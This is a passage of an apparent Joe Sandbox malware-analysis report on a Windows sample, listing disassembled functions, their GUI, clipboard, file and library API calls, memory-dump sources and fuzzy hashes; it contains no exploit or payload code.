                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5A611471B4071076EA306A229C46FAB735CDF14345F50052FFC01A628BE7ADDA4A86EE
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00433D5C Relevance: 42.2, APIs: 28, Instructions: 198windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetSysColor.USER32(0000000E), ref: 00433D81
                                                                                                                                                                                                                                                                                                                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 00433D89
                                                                                                                                                                                                                                                                                                                                                                                                                • GetSysColor.USER32(00000012), ref: 00433DA3
                                                                                                                                                                                                                                                                                                                                                                                                                • SetTextColor.GDI32(?,?), ref: 00433DAB
                                                                                                                                                                                                                                                                                                                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00433DBF
                                                                                                                                                                                                                                                                                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 00433DCB
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateSolidBrush.GDI32(?), ref: 00433DD4
                                                                                                                                                                                                                                                                                                                                                                                                                • GetSysColor.USER32(00000011), ref: 00433DEB
                                                                                                                                                                                                                                                                                                                                                                                                                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00433DFD
                                                                                                                                                                                                                                                                                                                                                                                                                • SelectObject.GDI32(?,00000000), ref: 00433E0D
                                                                                                                                                                                                                                                                                                                                                                                                                • SetBkColor.GDI32(?,?), ref: 00433E19
                                                                                                                                                                                                                                                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 00433E29
                                                                                                                                                                                                                                                                                                                                                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 00433E54
                                                                                                                                                                                                                                                                                                                                                                                                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00433E73
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowLongW.USER32 ref: 00433E8A
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00433EAC
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowTextW.USER32(00000000,00000000,00000105), ref: 00433EE1
                                                                                                                                                                                                                                                                                                                                                                                                                • InflateRect.USER32(?,000000FD,000000FD), ref: 00433F13
                                                                                                                                                                                                                                                                                                                                                                                                                • DrawFocusRect.USER32(?,?), ref: 00433F1F
                                                                                                                                                                                                                                                                                                                                                                                                                • GetSysColor.USER32(00000011), ref: 00433F2E
                                                                                                                                                                                                                                                                                                                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 00433F36
                                                                                                                                                                                                                                                                                                                                                                                                                • DrawTextW.USER32(?,?,000000FF,?,?), ref: 00433F4E
                                                                                                                                                                                                                                                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 00433F63
                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00433F70
                                                                                                                                                                                                                                                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 00433F78
                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00433F7B
                                                                                                                                                                                                                                                                                                                                                                                                                • SetTextColor.GDI32(?,?), ref: 00433F83
                                                                                                                                                                                                                                                                                                                                                                                                                • SetBkColor.GDI32(?,?), ref: 00433F8F
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1582027408-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 0b51a09b4c85f12ae70b13129e7bad5c5e259c1925df30aaa8741127af755d25
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: aa454ab644ffbff4d2185aee23397a25bdbdaef3ad5a75b83a3ebbbeed3afe32
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0b51a09b4c85f12ae70b13129e7bad5c5e259c1925df30aaa8741127af755d25
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 53710570508340AFD304DF68DD88A6FBBF9FF89711F104A2DFA5592290D7B4E9418B6A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0046C604 Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 216clipboardCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • OpenClipboard.USER32(?), ref: 0046C635
                                                                                                                                                                                                                                                                                                                                                                                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046C643
                                                                                                                                                                                                                                                                                                                                                                                                                • GetClipboardData.USER32(0000000D), ref: 0046C64F
                                                                                                                                                                                                                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 0046C65D
                                                                                                                                                                                                                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 0046C688
                                                                                                                                                                                                                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 0046C692
                                                                                                                                                                                                                                                                                                                                                                                                                • IsClipboardFormatAvailable.USER32(00000001), ref: 0046C6D5
                                                                                                                                                                                                                                                                                                                                                                                                                • GetClipboardData.USER32(00000001), ref: 0046C6DD
                                                                                                                                                                                                                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 0046C6EE
                                                                                                                                                                                                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0046C726
                                                                                                                                                                                                                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 0046C866
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Clipboard$CloseGlobal$AvailableDataFormatLock$OpenUnlock
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: HH
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 589737431-2761332787
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 1f8588b948bb152d659cc961560e711d284fc80ef968a1445fa6f6d22cce4332
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: ccec0c76267f611a980a6192e38ed766f4c6ddce8b7f15b38bc446a2cb1d96e7
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1f8588b948bb152d659cc961560e711d284fc80ef968a1445fa6f6d22cce4332
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D61E5722003019BD310EF65DD86B5E77A8EF54715F00483EFA41E72D1EBB5D9048BAA
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0045657D Relevance: 38.8, APIs: 19, Strings: 3, Instructions: 287windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 00456692
                                                                                                                                                                                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 004566AA
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000), ref: 004566B1
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0045670D
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00456720
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?), ref: 00456731
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456779
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 00456797
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567C0
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000421,?,?), ref: 004567D8
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 004567EE
                                                                                                                                                                                                                                                                                                                                                                                                                • IsWindowVisible.USER32(?), ref: 00456812
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 0045682E
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 00456843
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0045685C
                                                                                                                                                                                                                                                                                                                                                                                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 00456880
                                                                                                                                                                                                                                                                                                                                                                                                                • GetMonitorInfoW.USER32 ref: 00456894
                                                                                                                                                                                                                                                                                                                                                                                                                • CopyRect.USER32(?,?), ref: 004568A8
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000412,00000000), ref: 0045690A
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$MessageSend$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: ($,$tooltips_class32
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 541082891-3320066284
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 3987ef5f26dee50c6234681dd74380f3ee0746d74ffcadc96223edc745891050
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 33B18EB0604341AFD714DF64C984B6BB7E5EF88704F408D2DF989A7292D778E848CB5A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00454DAA Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 203windowlibraryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00454DCF
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00454DE2
                                                                                                                                                                                                                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 00454DEF
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00454E04
                                                                                                                                                                                                                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 00454E11
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00454E24
                                                                                                                                                                                                                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 00454E31
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D0: __wcsicmp_l.LIBCMT ref: 00411657
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00454E65
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,?,?,?,?,?,?,?,00000000), ref: 00454E79
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadImageW.USER32(00000000,00000000,?,00000001,?,?), ref: 00454EB7
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00454EFB
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadImageW.USER32(00000000,00000000,?,00000001,?,?), ref: 00454F2C
                                                                                                                                                                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00454F37
                                                                                                                                                                                                                                                                                                                                                                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,?,00000001), ref: 00454F94
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyIcon.USER32(?), ref: 00454FA2
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00454FC0
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00454FCC
                                                                                                                                                                                                                                                                                                                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00454FF1
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Load$Image_wcslen$__wcsicoll$IconLibraryMessageSend$DestroyExtractFreeMoveWindow__wcsicmp_l
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: .dll$.exe$.icl
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2511167534-1154884017
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 3f138871eb6b7f703bfd118eaab481945a2915db6d26b5ab3e2ea40d00a2935e
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 777b7c61fe84a0ac0f88e3bb9536c5d4e291b97e4b5026f6b39318954af55ba4
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f138871eb6b7f703bfd118eaab481945a2915db6d26b5ab3e2ea40d00a2935e
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D461D9711043016AE620DF659D85F7B73ECEF84B0AF00481EFE81D5182E7B9A989C77A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00436B3A Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 190COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00436B4E
                                                                                                                                                                                                                                                                                                                                                                                                                • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000), ref: 00436B73
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00436B79
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscpy.LIBCMT ref: 00436B9F
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 00436BC0
                                                                                                                                                                                                                                                                                                                                                                                                                • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00436BE7
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 00436C2A
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 00436C31
                                                                                                                                                                                                                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 00436C4B
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcsncpy.LIBCMT ref: 00436C62
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1503153545-1459072770
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 008cb01cbb675dac6eb9866d49a054c7095339c3b591b4350c6f773ace1c370f
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: f4118b49cd66f9fee818cdfc0bae26735a4a754b0a3131160812af9443992caa
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 008cb01cbb675dac6eb9866d49a054c7095339c3b591b4350c6f773ace1c370f
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B54115B264020137D200B7269C83EFF735CDE99715F54091FFE45A2253FA2EA69642BE
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00452788 Relevance: 34.8, APIs: 23, Instructions: 344COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004431E0: __time64.LIBCMT ref: 004431EA
                                                                                                                                                                                                                                                                                                                                                                                                                • _fseek.LIBCMT ref: 004527FC
                                                                                                                                                                                                                                                                                                                                                                                                                • __wsplitpath.LIBCMT ref: 0045285C
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscpy.LIBCMT ref: 00452871
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 00452886
                                                                                                                                                                                                                                                                                                                                                                                                                • __wsplitpath.LIBCMT ref: 004528B0
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 004528C8
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 004528DD
                                                                                                                                                                                                                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 00452914
                                                                                                                                                                                                                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 00452925
                                                                                                                                                                                                                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 00452944
                                                                                                                                                                                                                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 00452955
                                                                                                                                                                                                                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 00452976
                                                                                                                                                                                                                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 00452987
                                                                                                                                                                                                                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 00452998
                                                                                                                                                                                                                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 004529A9
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 00452432
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045244F
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 0045247D
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045248E
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004524AB
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 004524D9
                                                                                                                                                                                                                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 00452A39
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2054058615-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 983239acf030dd5dbcb525efe1f3094d5bf78e470c43ee0c462dc16c64ee25c2
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 66779ec6e5012556871fefb3c18d5d4f0449fb8b445ab61f685bb60241e2a5ae
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 983239acf030dd5dbcb525efe1f3094d5bf78e470c43ee0c462dc16c64ee25c2
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 16C14EB2508340ABD320DF65C881EEBB7E8EFC9714F444D2FF68987241E6799544CBA6
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004559A8 Relevance: 33.7, APIs: 18, Strings: 1, Instructions: 401COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 0476511f06c615c4519fb5d0bdcf97e6c9114ef5bab3d74fcb2069946f87bde7
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: a4e6889c8706d2a682ad3cc8acca51b009283e1ae9b51da70db0806919efebf9
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0476511f06c615c4519fb5d0bdcf97e6c9114ef5bab3d74fcb2069946f87bde7
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 95C104723403416BF3209B64DC46FBBB794EB95321F04453FFA45D62C1EBBA9409876A
